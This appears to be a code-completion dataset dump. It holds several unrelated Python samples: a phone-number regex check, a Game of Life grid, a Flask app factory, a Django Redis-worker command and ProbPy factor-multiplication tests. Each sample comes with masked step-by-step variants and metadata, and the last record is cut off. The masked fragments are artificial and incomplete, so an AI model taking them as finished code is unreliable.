if re.findall(pattern, n):
print(n, "は電話番号の形式です")
else:
print(n, "は電話番号の形式ではありません")
|
normal
|
{
"blob_id": "7ea81f83f556fcc55c9c9d44bcd63c583829fc08",
"index": 8977,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-3": "<mask token>\nn = input('電話番号を入力してください>>')\npattern = (\n '[\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-]{0,1}[0-9]{3,4}')\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-4": "import re\nn = input('電話番号を入力してください>>')\npattern = (\n '[\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-]{0,1}[0-9]{3,4}')\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-5": "import re\n\nn = input(\"電話番号を入力してください>>\")\npattern = r'[\\(]{0,1}[0-9]{2,4}[\\)\\-\\(]{0,1}[0-9]{2,4}[\\)\\-]{0,1}[0-9]{3,4}'\nif re.findall(pattern, n):\n print(n, \"は電話番号の形式です\")\nelse:\n print(n, \"は電話番号の形式ではありません\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class Cells:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, nx, ny, density=5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in
range(nx)]
self._gen = [[(0) for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
status = Cells.ALIVE if random.randint(0, 100
) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
<|reserved_special_token_0|>
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (
0, 1), (1, 1)
for ix, iy in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=
1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Cells:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, nx, ny, density=5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in
range(nx)]
self._gen = [[(0) for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
status = Cells.ALIVE if random.randint(0, 100
) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
def gen(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return 0
return self._gen[x][y]
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (
0, 1), (1, 1)
for ix, iy in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=
1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Cells:
UNDEFINED = 0
DEAD = 1
ALIVE = 2
def __init__(self, nx, ny, density=5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in
range(nx)]
self._gen = [[(0) for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
status = Cells.ALIVE if random.randint(0, 100
) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
def gen(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return 0
return self._gen[x][y]
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (
0, 1), (1, 1)
for ix, iy in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=
1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
<|reserved_special_token_1|>
import random
import time
class Cells:
UNDEFINED = 0
DEAD = 1
ALIVE = 2
def __init__(self, nx, ny, density=5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in
range(nx)]
self._gen = [[(0) for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
status = Cells.ALIVE if random.randint(0, 100
) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
def gen(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return 0
return self._gen[x][y]
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (
0, 1), (1, 1)
for ix, iy in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=
1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
<|reserved_special_token_1|>
import random
import time
class Cells:
UNDEFINED = 0
DEAD = 1
ALIVE = 2
def __init__(self, nx, ny, density = 5):
self.nx = nx
self.ny = ny
self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]
self._gen = [[0 for y in range(ny)] for x in range(nx)]
for x in range(nx):
for y in range(ny):
# status = random.choice((Cells.DEAD, Cells.ALIVE))
status = Cells.ALIVE if random.randint(0, 100) < density else Cells.DEAD
self._cells[x][y] = status
self._gen[x][y] = status - 1
def cell(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return Cells.DEAD
return self._cells[x][y]
# return self._cells[x % self.nx][y % self.ny]
def gen(self, x, y):
if x < 0 or x >= self.nx or y < 0 or y >= self.ny:
return 0
return self._gen[x][y]
def _countAliveNeighbours(self, x, y):
aliveNeighbours = 0
neighbours = ((-1, -1), (0, -1), ( 1, -1),
(-1, 0), ( 1, 0),
(-1, 1), (0, 1), ( 1, 1))
for (ix, iy) in neighbours:
neighbour = self.cell(x + ix, y + iy)
if neighbour == Cells.ALIVE:
aliveNeighbours += 1
return aliveNeighbours
def survive(self):
for x in range(self.nx):
for y in range(self.ny):
aliveNeighbours = self._countAliveNeighbours(x, y)
if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <= 1 or aliveNeighbours >= 4):
self._nextCells[x][y] = Cells.DEAD
self._gen[x][y] = 0
elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:
self._nextCells[x][y] = Cells.ALIVE
self._gen[x][y] = 1
else:
self._nextCells[x][y] = self._cells[x][y]
self._gen[x][y] += 1
self._cells = self._nextCells[:]
|
flexible
|
{
"blob_id": "563e534e4794aa872dcdc5319b9a1943d19f940f",
"index": 1289,
"step-1": "<mask token>\n\n\nclass Cells:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, nx, ny, density=5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in\n range(nx)]\n self._gen = [[(0) for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n status = Cells.ALIVE if random.randint(0, 100\n ) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n <mask token>\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (\n 0, 1), (1, 1)\n for ix, iy in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=\n 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n",
"step-2": "<mask token>\n\n\nclass Cells:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, nx, ny, density=5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in\n range(nx)]\n self._gen = [[(0) for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n status = Cells.ALIVE if random.randint(0, 100\n ) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n\n def gen(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return 0\n return self._gen[x][y]\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (\n 0, 1), (1, 1)\n for ix, iy in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=\n 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n",
"step-3": "<mask token>\n\n\nclass Cells:\n UNDEFINED = 0\n DEAD = 1\n ALIVE = 2\n\n def __init__(self, nx, ny, density=5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in\n range(nx)]\n self._gen = [[(0) for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n status = Cells.ALIVE if random.randint(0, 100\n ) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n\n def gen(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return 0\n return self._gen[x][y]\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (\n 0, 1), (1, 1)\n for ix, iy in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=\n 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n",
"step-4": "import random\nimport time\n\n\nclass Cells:\n UNDEFINED = 0\n DEAD = 1\n ALIVE = 2\n\n def __init__(self, nx, ny, density=5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in\n range(nx)]\n self._gen = [[(0) for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n status = Cells.ALIVE if random.randint(0, 100\n ) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n\n def gen(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return 0\n return self._gen[x][y]\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = (-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (\n 0, 1), (1, 1)\n for ix, iy in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <=\n 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n",
"step-5": "import random\nimport time\n\nclass Cells:\n UNDEFINED = 0\n DEAD = 1\n ALIVE = 2\n\n def __init__(self, nx, ny, density = 5):\n self.nx = nx\n self.ny = ny\n self._cells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._nextCells = [[Cells.UNDEFINED for y in range(ny)] for x in range(nx)]\n self._gen = [[0 for y in range(ny)] for x in range(nx)]\n for x in range(nx):\n for y in range(ny):\n# status = random.choice((Cells.DEAD, Cells.ALIVE))\n status = Cells.ALIVE if random.randint(0, 100) < density else Cells.DEAD\n self._cells[x][y] = status\n self._gen[x][y] = status - 1\n\n def cell(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return Cells.DEAD\n return self._cells[x][y]\n# return self._cells[x % self.nx][y % self.ny]\n\n def gen(self, x, y):\n if x < 0 or x >= self.nx or y < 0 or y >= self.ny:\n return 0\n return self._gen[x][y]\n\n def _countAliveNeighbours(self, x, y):\n aliveNeighbours = 0\n neighbours = ((-1, -1), (0, -1), ( 1, -1),\n (-1, 0), ( 1, 0),\n (-1, 1), (0, 1), ( 1, 1))\n for (ix, iy) in neighbours:\n neighbour = self.cell(x + ix, y + iy)\n if neighbour == Cells.ALIVE:\n aliveNeighbours += 1\n return aliveNeighbours\n\n def survive(self):\n for x in range(self.nx):\n for y in range(self.ny):\n aliveNeighbours = self._countAliveNeighbours(x, y)\n if self._cells[x][y] == Cells.ALIVE and (aliveNeighbours <= 1 or aliveNeighbours >= 4):\n self._nextCells[x][y] = Cells.DEAD\n self._gen[x][y] = 0\n elif self._cells[x][y] == Cells.DEAD and aliveNeighbours == 3:\n self._nextCells[x][y] = Cells.ALIVE\n self._gen[x][y] = 1\n else:\n self._nextCells[x][y] = self._cells[x][y]\n self._gen[x][y] += 1\n self._cells = self._nextCells[:]\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
# -*- coding: utf-8 -*-
"""The main application module for duffy."""
from flask import Flask
from duffy import api_v1
from duffy.types import seamicro
from duffy.extensions import db, migrate, marshmallow
from duffy.config import ProdConfig,DevConfig
def create_app(config_object=DevConfig):
    """Application factory: build and configure the duffy Flask app.

    Args:
        config_object: configuration class to load (defaults to DevConfig).

    Returns:
        The fully configured Flask application instance.
    """
    application = Flask(__name__.split('.')[0])
    application.config.from_object(config_object)
    # An env-var-pointed settings file may override defaults; silent=True
    # means a missing DUFFY_SETTINGS variable is not an error.
    application.config.from_envvar('DUFFY_SETTINGS', silent=True)

    for register in (register_extensions, register_blueprints,
                     register_errorhandlers):
        register(application)
    return application
def register_extensions(app):
    """Wire the shared Flask extension singletons up to *app*.

    The extension objects live in duffy.extensions and are bound to the
    application here, per the Flask app-factory pattern.
    """
    db.init_app(app)
    # render_as_batch=True: batch-mode Alembic migrations -- presumably to
    # cope with SQLite's limited ALTER TABLE support; TODO confirm.
    migrate.init_app(app, db, render_as_batch=True)
    marshmallow.init_app(app)
def register_blueprints(app):
    """Mount every duffy blueprint on *app*, in registration order."""
    for blueprint in (api_v1.views.blueprint, seamicro.views.blueprint):
        app.register_blueprint(blueprint)
def register_errorhandlers(app):
    """Placeholder for application-wide error handlers.

    Nothing is registered yet; presumably kept so create_app's
    registration sequence stays uniform once handlers are added.
    """
    return None
|
normal
|
{
"blob_id": "11101273a02abec17fc884d5c1d5d182eb82ee0c",
"index": 4625,
"step-1": "<mask token>\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS', silent=True)\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\n<mask token>\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-2": "<mask token>\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS', silent=True)\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\n<mask token>\n\n\ndef register_blueprints(app):\n app.register_blueprint(api_v1.views.blueprint)\n app.register_blueprint(seamicro.views.blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-3": "<mask token>\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS', silent=True)\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\ndef register_extensions(app):\n db.init_app(app)\n migrate.init_app(app, db, render_as_batch=True)\n marshmallow.init_app(app)\n return None\n\n\ndef register_blueprints(app):\n app.register_blueprint(api_v1.views.blueprint)\n app.register_blueprint(seamicro.views.blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-4": "<mask token>\nfrom flask import Flask\nfrom duffy import api_v1\nfrom duffy.types import seamicro\nfrom duffy.extensions import db, migrate, marshmallow\nfrom duffy.config import ProdConfig, DevConfig\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS', silent=True)\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\ndef register_extensions(app):\n db.init_app(app)\n migrate.init_app(app, db, render_as_batch=True)\n marshmallow.init_app(app)\n return None\n\n\ndef register_blueprints(app):\n app.register_blueprint(api_v1.views.blueprint)\n app.register_blueprint(seamicro.views.blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"The main application module for duffy.\"\"\"\nfrom flask import Flask\n\nfrom duffy import api_v1\nfrom duffy.types import seamicro\n\nfrom duffy.extensions import db, migrate, marshmallow\nfrom duffy.config import ProdConfig,DevConfig\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS',silent=True)\n\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\ndef register_extensions(app):\n db.init_app(app)\n migrate.init_app(app, db, render_as_batch=True)\n marshmallow.init_app(app)\n return None\n\n\ndef register_blueprints(app):\n app.register_blueprint(api_v1.views.blueprint)\n app.register_blueprint(seamicro.views.blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Command(BaseCommand):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Command(BaseCommand):
def handle(self, *args, **options):
rqueue = RedisQueue(settings.REDIS_URL)
rqueue.worker()
<|reserved_special_token_1|>
from django.core.management.base import BaseCommand, CommandError
from tasks.redisqueue import RedisQueue
from django.conf import settings
class Command(BaseCommand):
def handle(self, *args, **options):
rqueue = RedisQueue(settings.REDIS_URL)
rqueue.worker()
|
flexible
|
{
"blob_id": "cccf6ec50ae00d8e00a1a53ea06fa8b6d061b72e",
"index": 8258,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Command(BaseCommand):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n rqueue = RedisQueue(settings.REDIS_URL)\n rqueue.worker()\n",
"step-4": "from django.core.management.base import BaseCommand, CommandError\nfrom tasks.redisqueue import RedisQueue\nfrom django.conf import settings\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n rqueue = RedisQueue(settings.REDIS_URL)\n rqueue.worker()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from nose.tools import with_setup, nottest
from tests.par_test_base import ParTestBase
from ProbPy import RandVar, Factor, ParFactor
class TestFactorMult(ParTestBase):
    """Checks that ParFactor.mult agrees with the sequential Factor.mult.

    Every test multiplies the same operands with the plain factors and the
    parallel factors at parallel depths 0-3, then asserts the results match
    on both random variables and values.  The original per-test bodies were
    near-identical copy-paste (some even called setMaxDepth twice on the
    same factor); the shared logic now lives in two private helpers.
    """

    def __init__(self):
        super().__init__()

    def _assert_equal(self, seq_res, par_res):
        # Sequential and parallel products must agree exactly.
        assert (
            seq_res.rand_vars == par_res.rand_vars
            and seq_res.values == par_res.values
        )

    def _check_scalar(self, factor, par_factor):
        """Multiply *factor* by the scalar fixtures at every depth 0-3."""
        for depth in range(4):
            par_factor.setMaxDepth(depth)

            res = [
                factor.mult(self.scalar),
                factor.mult(self.scalarf),
                self.scalarf.mult(factor),
            ]
            par_res = [
                par_factor.mult(self.scalar),
                par_factor.mult(self.par_scalarf),
                self.par_scalarf.mult(par_factor),
            ]

            for seq, par in zip(res, par_res):
                self._assert_equal(seq, par)

    def _check_mult(self, factor_a, factor_b, par_a, par_b):
        """Multiply the factor pair both sequentially and in parallel at
        every depth 0-3 and compare the products.  Passing the same object
        for both parallel factors is fine: setMaxDepth is idempotent."""
        for depth in range(4):
            par_a.setMaxDepth(depth)
            par_b.setMaxDepth(depth)
            self._assert_equal(factor_a.mult(factor_b), par_a.mult(par_b))

    def par_test_0(self):
        """
        f(X), scalar
        """
        self._check_scalar(self.X_factor, self.X_par_factor)

    def par_test_1(self):
        """
        f(X, Y), scalar
        """
        self._check_scalar(self.XY_factor, self.XY_par_factor)

    def par_test_2(self):
        """
        f(X, Y, Z), scalar
        """
        self._check_scalar(self.XYZ_factor, self.XYZ_par_factor)

    def par_test_3(self):
        """
        f(X), f(X)
        """
        self._check_mult(self.X_factor, self.X_factor,
                         self.X_par_factor, self.X_par_factor)

    def par_test_4(self):
        """
        f(X), f(Y)
        """
        self._check_mult(self.X_factor, self.Y_factor,
                         self.X_par_factor, self.Y_par_factor)

    def par_test_5(self):
        """
        f(X, Y) f(X)
        """
        self._check_mult(self.XY_factor, self.X_factor,
                         self.XY_par_factor, self.X_par_factor)

    def par_test_6(self):
        """
        f(X, Y) f(Y)
        """
        self._check_mult(self.XY_factor, self.Y_factor,
                         self.XY_par_factor, self.Y_par_factor)

    def par_test_7(self):
        """
        f(X, Y) f(Z)
        """
        self._check_mult(self.XY_factor, self.Z_factor,
                         self.XY_par_factor, self.Z_par_factor)

    def par_test_8(self):
        """
        f(X, Y) f(X, Y)
        """
        self._check_mult(self.XY_factor, self.XY_factor,
                         self.XY_par_factor, self.XY_par_factor)

    def par_test_9(self):
        """
        f(X, Y) F(X, Z)
        """
        self._check_mult(self.XY_factor, self.XZ_factor,
                         self.XY_par_factor, self.XZ_par_factor)

    def par_test_10(self):
        """
        f(X, Y) f(Z, W)
        """
        self._check_mult(self.XY_factor, self.ZW_factor,
                         self.XY_par_factor, self.ZW_par_factor)

    def par_test_11(self):
        """
        f(X, Y, Z) f(X, Y, Z)
        """
        self._check_mult(self.XYZ_factor, self.XYZ_factor,
                         self.XYZ_par_factor, self.XYZ_par_factor)

    def par_test_12(self):
        """
        f(X, Y, Z) f(X, Y, W)
        """
        self._check_mult(self.XYZ_factor, self.XYW_factor,
                         self.XYZ_par_factor, self.XYW_par_factor)

    def par_test_13(self):
        """
        f(X, Y, Z) f(X, K, W)
        """
        self._check_mult(self.XYZ_factor, self.XKW_factor,
                         self.XYZ_par_factor, self.XKW_par_factor)

    def par_test_14(self):
        """
        f(X, Y, Z) f(T, K, W)
        """
        self._check_mult(self.XYZ_factor, self.TKW_factor,
                         self.XYZ_par_factor, self.TKW_par_factor)
|
normal
|
{
"blob_id": "0aad96de65cc125e5c026dfd72a9cc9f4ebd3dd2",
"index": 6486,
"step-1": "<mask token>\n\n\nclass TestFactorMult(ParTestBase):\n\n def __init__(self):\n super().__init__()\n <mask token>\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = [self.XY_factor.mult(self.scalar), self.XY_factor.mult(\n self.scalarf), self.scalarf.mult(self.XY_factor)]\n par_res = [self.XY_par_factor.mult(self.scalar), self.\n XY_par_factor.mult(self.par_scalarf), self.par_scalarf.mult\n (self.XY_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n <mask token>\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n for i in 